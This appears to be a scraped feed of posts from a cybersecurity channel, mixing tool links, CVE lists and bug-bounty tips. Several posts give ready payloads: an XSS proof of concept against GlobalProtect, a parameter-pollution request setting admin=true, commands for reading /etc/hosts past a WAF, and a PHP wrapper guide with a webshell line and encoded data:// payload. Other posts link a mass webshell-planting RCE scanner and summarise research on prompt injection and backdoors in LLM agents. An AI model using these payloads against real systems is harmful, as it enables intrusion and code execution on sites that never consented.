2777
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Windows lateral movement quick reference
#ThreatHunting #DFIR
People are happy just because OpenAI released there New and Most intelligent Chat Model GPT-5
But as a cybersecurity experts do u think this is a future or a threat?
I have posted a thread on this please do check this out.
https://x.com/Cipher0ps_tech/status/1953701559545868545
#Research
#MLSecOps
"Security study based on the ChatGPT plugin system: Identifying Security Vulnerabilities", 2024.
// The aim of this paper is to explore the security ofplugins in the CHATGPT plugin store, reveal the main security vulnerabilities thatexist, and suggest improvements
⭐️PACU - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments.
✅https://github.com/RhinoSecurityLabs/pacu
Hey everyone,
I just open-sourced a project I've been working on called PITT.
It's a CLI tool to help developers and security folks test their LLM applications against the OWASP LLM Top 10.
It uses a configurable "Judge LLM" to make the vulnerability detection much more accurate than simple keyword matching.
Would love for you to check it out and hear what you think!
GitHub Link: https://github.com/Addy-shetty/Pitt.git
Bug Bounty Tip: HTTP Parameter Pollution (HPP)
Some apps mishandle duplicate parameters. You can bypass logic or elevate privileges by injecting multiple values:
GET /transfer?amount=100&admin=true&amount=1
⚠️ Always test:
•param=value1¶m=value2
•Encoded (%26,)
#exploit
1⃣ CVE-2025-4660:
Windows Forescout SecureConnector RCE
2⃣ CVE-2025-48384:
Breaking git with a carriage return and cloning RCE
3⃣ CVE-2025-32023:
RCE in Redis >= 2.8
4⃣ CVE-2023-4272:
Cache Coherence Vulnerability in the Mali GPU Driver
5⃣ The Journey of Bypassing Ubuntu’s Unprivileged Namespace Restriction
6⃣ CVE-2025-6759:
LPE in Citrix Virtual Apps and Desktops
]-> Tool to test/mitigation
7⃣ CVE-2024-7401:
Improper Authentication in Netskope Client
8⃣ RCE Vulnerability in ETQ Reliance
// Disclaimer
The recently disclosed XSS vulnerability in GlobalProtect (CVE-2025-0133) has affected hundreds of thousands of organizations worldwide — including thousands of bug bounty programs.
Try your luck by running this PoC /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer
⚡CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others
✅https://github.com/spyboy-productions/CloakQuest3r
guys after a long time i created a web app to play a suduko game
check out the repo and let me know
https://github.com/Addy-shetty/Suduko_to_play
HTB- ALL modules
Run:
python -m http.server 8000
🚀 Exciting News for #InfoSec & #BugBounty! 🛡
ProxSec v1.0.0 is out—an open-source extension for security pros! 🔥
✅ Proxy management
✅ Scope validation
✅ Program tracking
✅ Lightweight & private
Open-Source : https://github.com/aacle/ProxSec
Feedback welcome! 💬
https://pocorexp.nsa.im
lists all CVEs and public exploit
⚡Bypass Series for bug hunters😎
Part-2
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
xxd -p /etc/hosts | xxd -p -r
xargs -d '\n' -I{} echo {} < /etc/hosts
perl -pe '' /etc/hosts
sed '' /etc/hosts
awk '{print}' /etc/hosts
dd if=/etc/hosts 2>/dev/null
#Bugbountytips #infosec
Guys check this out, My obsidian notes is now online let me know how it is and happy to listen to your feedback
https://obsius.site/1o2o0n6w0j0q4u48454m
⚡️SSRFUtility - SSRF Exploitation Tool
🔗 https://ssrf.cvssadvisor.com/
#Analytics
#MLSecOps
#Threat_Research
"AI Threat Landscape Report", 2025.
See also:
]-> 2025 GenAI Code Security Report (.pdf)
]-> LLM and Gen AI Data Security Best Practices
#tools
#MLSecOps
#Offensive_security
Security Solutions for AI Systems
1⃣ Confidential Computing
1.1 Sentient Enclaves Framework
1.2 SyMPC - SMPC companion library for Syft
1.3 Confidential Computing API
2⃣ Encryption and Data Protection
2.1 IronCoreLabs Transform encryption lib for Scala
2.2 Diffprivlib - IBM Differential Privacy Library
2.3 TenSEAL - Library for doing homomorphic encryption operations on tensors
2.4 PyDP - Python Differential Privacy Library
3⃣ Governance
3.1 VerifyWise - Open source AI governance platform
3.2 Cartai - OSS AI supervisor Agent
4⃣ Model Testing
4.1 Plexiglass - tool to detect/protect LLM vulns
4.2 Giskard-AI - Evaluation/testing for LLM systems
4.3 ModelScan - ML Model Security Scanner
4.4 LlamaFirewall, PurpleLlama - Tools to LLM security
4.5 Garak - LLM vulnerability scanner
4.6 Package for LLM jailbreak evaluation
5⃣ Prompt Firewall and Redaction
5.1 Guardrails AI - Adding guardrails to LLMs
5.2 Private AI - Detect, anonymize, and replace PII
5.3 Lakera Guard - ChatGPT Data Leak Protection
5.4 Rebuff - LLM Prompt Injection Detector
5.5 Trylon Gateway - Open Source Firewall for LLMs
5.6 LLM Guard, Vigil - Security scanner for LLM prompts
5.7 MCP-Scan - Security scanner tool for MCP servers
5.8 Vibranium Dome - LLM WAF for Agents
6⃣ AI Quality Controls and Testing
6.1 GenAI Prompt Fuzzer
6.2 FuzzyAI, LLMFuzzer Frameworks
6.3 Test Generation for Prompts
6.4 Promptfoo: LLM Evals & Red Teaming
7⃣ Training Data Protection
7.1 Trusted-AI - Adversarial Robustness Toolbox
7.2 datasig - Dataset fingerprinting for AIBOM
8⃣ AI for Offensive Cyber
8.1 Vulnhuntr - AI-Discovered 0-day Tool
8.2 Confident AI - LLM Red Teaming Framework
8.3 Agentic LLM Vulnerability Scanner / AI RedTeam Kit
8.4 llm-attacks - Attacks on Aligned LLMs
8.5 HackGPT - Tool using ChatGPT for hacking
8.6 AI/ML Exploits, CAI CTF Framework
#Research
#MLSecOps
"From Prompt Injections to Protocol Exploits:
Threats in LLM-Powered AI Agents Workflows", 2025.
// In this Research, we introduce the first unified, end-to-end threat model for LLM-agent ecosystems, spanning host-to-tool and agent-to-agent communications, formalize adversary capabilities and attacker objectives, and catalog over thirty attack techniques. We organized the threat model into four domains: Input Manipulation (prompt injections, long-context hijacks, multimodal adversarial inputs), Model Compromise (prompt- and parameter-level backdoors, composite and encrypted multi-backdoors, poisoning strategies), System and Privacy Attacks (speculative side-channels, membership inference, retrieval poisoning, social-engineering simulations), and Protocol Vulnerabilities (exploits in Model Context Protocol, Agent Communication Protocol, Agent Network Protocol, Agent-to-Agent protocol)
https://www.notion.so/AD-aboud-1dcabf92dc0f805fb5e6fbb1917ff1f7?source=copy_link
Читать полностью…
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
✅https://github.com/ill-deed/CVE-2025-34085-Multi-target
Penetration Testing with KALI and More All You Need to Know full guide
Duration:- 7 Hour
https://beerus11.medium.com/redis-internals-and-use-cases-the-definitive-guide-4bab3b7faf11
Читать полностью…
This is my suggestion on who ever needs to start in cybersecurity a 6month plan
Читать полностью…
https://github.com/kh4sh3i/Application-Security-Interview-Questions
Читать полностью…
Spotlight on taiphung217: Five-Month Climb to Huntr Leaderboard Glory
https://blog.huntr.com/spotlight-taiphung217-five-month-huntr-leaderboard-climb
guys this is an updating blog of cipherops if u need anything you guys can go and check here if possible i would like to update 2vice in a week
https://cipherops.gitbook.io/bug-bounty-notes
🔥 Mastering PHP Filters & Wrappers for LFI to RCE — FULL GUIDE
⚠️Most hackers stop at reading logs.
The elite use PHP wrappers to turn LFI into remote code execution.
This post is your all-in-one breakdown of how PHP wrappers work and how to exploit them like a pro. 👇
🎯 Why PHP Wrappers Matter in Bug Bounty
PHP provides built-in stream wrappers — special protocols to access I/O sources like files, memory, input/output streams, and even compressed/encrypted data.
php://filter/read=convert.base64-encode/resource=index
http://<IP>/index.php?file=php://filter/read=convert.base64-encode/resource=config
echo 'PD9waHAK...base64...' | base64 -d
<?php include('php://input'); ?>POST /index.php
<?php system($_GET['cmd']); ?>
include('expect://ls');include('data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==');zip://path/to/archive.zip#file_inside.txt
phar://path/to/phar_file
ffuf -w /opt/seclists/.../directory-list.txt -u http://<IP>/FUZZ.php
?file=config
?file=php://filter/read=convert.base64-encode/resource=config
echo 'base64-encoded-content' | base64 -d